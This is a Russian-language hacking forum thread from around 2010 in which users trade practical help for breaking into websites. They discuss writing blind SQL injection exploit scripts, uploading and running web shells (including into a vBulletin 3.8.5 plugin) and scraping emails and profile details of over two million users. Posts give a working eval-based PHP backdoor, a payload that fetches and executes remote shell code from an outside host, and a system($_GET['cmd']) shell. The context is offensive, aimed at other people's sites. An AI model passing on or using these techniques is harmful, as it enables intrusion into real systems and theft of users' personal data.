Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Может переменная в несколько запросов подставляется,крути как слепую.
     
  2. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Короче, хочу разобраться в написание скрипта эксплатирующего blind sql inj
    методом " Бинарный (двоичный) поиск нужного символа"

    токо я не допонимаю как написать реализацию (тут не оч. понтяно https://forum.antichat.ru/showpost.php?p=1258161&postcount=1)

    дайте плиз ссыль на наглядный пример того метода
     
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    там как раз таки довольно хорошо написано, ну а если ты разобраться не можешь то о каком скрипте может быть речь?
     
  4. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Твой ФТП, скорей всего, недоступен из веба да и все.
    Единственный путь- это найти на самом сайте локальный инклюд и найти, куда ты льешь шелл и заинклюдить его. Скинь лучше линк на сайт в теме.
     
    _________________________
  5. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Вопрос
    http://localhost/xxx.php?p=1 профиль первого юзера
    http://localhost/xxx.php?p=2 профиль второго юзера
    и т.д.
    В профиле указан город, мыло, имя, пол и т.д.
    юзеров более 2 млн. Как спарсить на автомате инфу обо всех юзерах?
    Чтобы дамп был вида:
    мыло, пол, город
    мыло, пол, город
    мыло, пол, город
    Буду рад любой помощи.
     
  6. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Залил веб шелл, пробую обратиться к нему - получаю пустую страницу (то что он по этому адресу - 100%). Простейшие же php файлы типа <?php echo 'asdasd'; ?> исполняются нормально. Что бы это могло быть?
     
  7. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    iv.
    Без линка причину тебе врятле скажут сразу же,могут быть только догадки.А то что он залился,это не факт,то что исполняется один код ето хорошо.
    Попробуй сделать следующее:
    Попробуй вставить в шаблон (или куда ты там впихиваешь пхп код) следующий код:
    <?php eval(stripslashes($_GET[e])); ?>
    Затем проверь:
    site.com/shablon.php?e=phpinfo();
    Если все окей и директива url_fopen = on то:
    site.com/shablon.php?e=eval(file_get_contents('http://tvoisite.com/shelleng.txt'));
    Убери только <?php и ?> из шелленга и залей на какой-нибудь фрихост с расширением тхт,пароль также советую убрать,т.к. шелл не заливается на сервак.
     
    #15647 ~d0s~, 17 Dec 2010
    Last edited: 17 Dec 2010
    1 person likes this.
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196

    Шелл, наверное, загзипован, а на сервере не стоит это расширение. Попробуй другой шелл, без gzinflate() или распакуй его.
     
    2 people like this.
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Кто может подсказать как из Acunetix Web Vulnerability Scanner снимать найденные уязвимости? сайт сканирован, нашел несколько SQL иньексии, но не показывает URL:
    [​IMG]

    вот не понимаю как отсюда эксплуатировать это делол.
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    давно не пользуюсь сканерами для багов, но если по памяти то , нажми на багу (скулю) с правой стороны проги eсть окошко где будет уязвимый скрипт и метод (пост или гет) ..
     
  11. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Подскажите с залитием шелла в булку

    Версия 3.8.5

    сделал плагин с шеллом

    /forum/faq.php?cmd=dir работает
    а phpinfo и остальное не хочет, в чем проблема!
    И кто знает еще способы залить шелл в этой версии!
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    напиши мне в пм, помогу
     
    2 people like this.
  13. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Это оффтоп.
    Надо писать парсер, который распарсит страницы сайта.
     
    _________________________
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Gorev

    А там с права я показал вам пол скрина и вот и другой часть:
    [​IMG]

    вот непонятно что где и как ... :(
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    B1t.exe

    параметр PageId уязвим, данные передаются методом POST, что не понятно?
     
    _________________________
    #15655 Konqi, 17 Dec 2010
    Last edited: 17 Dec 2010
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    твой скрин и дал ответ на твой вопрос, у меня скрины не грузились и я не видел что на них, только сейчас и увидел..
    попробуй тулзу от пашкелы она c пост методом работает..
     
  17. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    че то не понял.. т.е. эта прога так и не показывает уязвимые ссылки?
    тогда зачем такая громозкая программа и такая цена?

    А что за тулза от пашкелы?
     
  18. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Уязвимость в POST запросе, не в GET, штатными средствами браузера ты через адресную строку не передашь.
    +1 к вопросу про Пашкелу.
     
    _________________________
  19. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5

    https://forum.antichat.ru/thread148915-toolza.html
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows
    Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.
     
    _________________________
Thread Status:
Not open for further replies.